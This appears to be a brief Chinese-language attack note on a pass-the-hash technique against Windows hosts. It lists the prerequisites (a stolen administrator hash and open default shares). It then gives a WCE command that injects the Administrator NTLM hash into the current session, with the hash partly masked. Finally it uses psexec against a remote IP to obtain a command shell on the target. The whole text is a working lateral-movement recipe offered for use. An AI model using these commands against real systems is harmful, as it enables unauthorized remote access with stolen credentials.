前提:
1.获取到目标的管理员帐户hash
2.目标开放了默认共享端口

实施:
1.使用wce工具把目标的sessions设置为当前的session
 wce -s Administrator:500:×××87EEB66D08E08770:×××E22B1DFBFA6072

ps:可使用psexec.exe工具,
在建立共享连接后,直接使用psexec.exe操作,详见参数说明,替换上面所有指令
直接 psexec \\remoteIP cmd.exe 返回目标cmd